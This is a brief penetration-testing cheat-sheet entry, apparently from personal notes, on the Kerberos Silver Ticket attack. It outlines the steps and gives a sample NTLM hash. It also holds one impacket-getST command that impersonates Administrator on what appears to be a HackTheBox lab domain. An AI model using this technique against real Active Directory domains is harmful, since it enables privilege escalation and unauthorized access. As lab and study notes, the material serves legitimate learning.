Silver Ticket

The username and password of the service account is needed for this attack

Create a NTLM hash of the password

1443EC19DA4DAC4FFC953BCA1B57B4CF

Next you need the Domains SID

Create the ticket and connect with to mssql

OR

impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40

Last updated